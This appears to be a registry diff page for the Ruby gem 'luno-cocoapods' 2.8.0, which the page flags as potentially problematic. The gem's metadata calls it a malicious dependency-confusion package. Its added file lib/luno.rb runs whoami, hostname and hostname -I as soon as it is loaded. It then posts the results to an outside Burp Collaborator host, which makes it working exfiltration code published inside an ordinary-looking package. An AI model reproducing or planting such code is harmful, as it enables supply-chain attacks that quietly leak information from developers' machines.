luno-cocoapods 2.8.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of luno-cocoapods might be problematic. Click here for more details.
- checksums.yaml +7 -0
- data/lib/luno.rb +23 -0
- metadata +55 -0
checksums.yaml
ADDED
@@ -0,0 +1,7 @@
|
|
1
|
+
---
|
2
|
+
SHA256:
|
3
|
+
metadata.gz: a79d447faa170df56d05e1c267b2faab81cfe158f5237419e681ca735c971b29
|
4
|
+
data.tar.gz: 0a44f8fdba8ac0aaf99f1b273b0cc6003d59978cf02a15e36bf74d14d2870663
|
5
|
+
SHA512:
|
6
|
+
metadata.gz: f3ded9c32a749351a306acd535e43791831a9670bfdb7de99c5e27fe0dc04ba4a88383552b765505d2e5ae6a1168775dd44f3e3455d1057e5d564638a70eb9ab
|
7
|
+
data.tar.gz: a560980bd8c02a100a2cbc5f2d5844d86c56d3a6bc5e63bb0a4d363253961539e7e888b74dc9ef0f93304fc4db63b8c4717080d61a87405092bd3c4546a60dab
|
data/lib/luno.rb
ADDED
@@ -0,0 +1,23 @@
|
|
1
|
+
require 'rest-client'
|
2
|
+
|
3
|
+
# Collect system information
|
4
|
+
whoami = `whoami`.chomp
|
5
|
+
hostname = `hostname`.chomp
|
6
|
+
ip_address = `hostname -I`.chomp
|
7
|
+
|
8
|
+
# Prepare the data to send
|
9
|
+
payload = {
|
10
|
+
whoami: whoami,
|
11
|
+
hostname: hostname,
|
12
|
+
ip_address: ip_address
|
13
|
+
}
|
14
|
+
|
15
|
+
# Burp Collaborator URL
|
16
|
+
collaborator_url = "http://96d2uzs8p149pb8zr2r0fb706rci0aoz.oastify.com"
|
17
|
+
|
18
|
+
# Send the data to Burp Collaborator
|
19
|
+
begin
|
20
|
+
RestClient.post(collaborator_url, payload.to_json, content_type: :json)
|
21
|
+
rescue RestClient::Exception => e
|
22
|
+
puts "Error: #{e.message}"
|
23
|
+
end
|
metadata
ADDED
@@ -0,0 +1,55 @@
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
2
|
+
name: luno-cocoapods
|
3
|
+
version: !ruby/object:Gem::Version
|
4
|
+
version: 2.8.0
|
5
|
+
platform: ruby
|
6
|
+
authors:
|
7
|
+
- Your Name
|
8
|
+
bindir: bin
|
9
|
+
cert_chain: []
|
10
|
+
date: 2025-02-25 00:00:00.000000000 Z
|
11
|
+
dependencies:
|
12
|
+
- !ruby/object:Gem::Dependency
|
13
|
+
name: rest-client
|
14
|
+
requirement: !ruby/object:Gem::Requirement
|
15
|
+
requirements:
|
16
|
+
- - ">="
|
17
|
+
- !ruby/object:Gem::Version
|
18
|
+
version: '0'
|
19
|
+
type: :runtime
|
20
|
+
prerelease: false
|
21
|
+
version_requirements: !ruby/object:Gem::Requirement
|
22
|
+
requirements:
|
23
|
+
- - ">="
|
24
|
+
- !ruby/object:Gem::Version
|
25
|
+
version: '0'
|
26
|
+
description: This gem is used to demonstrate dependency confusion.
|
27
|
+
email:
|
28
|
+
- your-email@example.com
|
29
|
+
executables: []
|
30
|
+
extensions: []
|
31
|
+
extra_rdoc_files: []
|
32
|
+
files:
|
33
|
+
- lib/luno.rb
|
34
|
+
homepage: https://example.com
|
35
|
+
licenses:
|
36
|
+
- MIT
|
37
|
+
metadata: {}
|
38
|
+
rdoc_options: []
|
39
|
+
require_paths:
|
40
|
+
- lib
|
41
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
42
|
+
requirements:
|
43
|
+
- - ">="
|
44
|
+
- !ruby/object:Gem::Version
|
45
|
+
version: '0'
|
46
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
47
|
+
requirements:
|
48
|
+
- - ">="
|
49
|
+
- !ruby/object:Gem::Version
|
50
|
+
version: '0'
|
51
|
+
requirements: []
|
52
|
+
rubygems_version: 3.6.3
|
53
|
+
specification_version: 4
|
54
|
+
summary: Malicious komoju gem for dependency confusion
|
55
|
+
test_files: []
|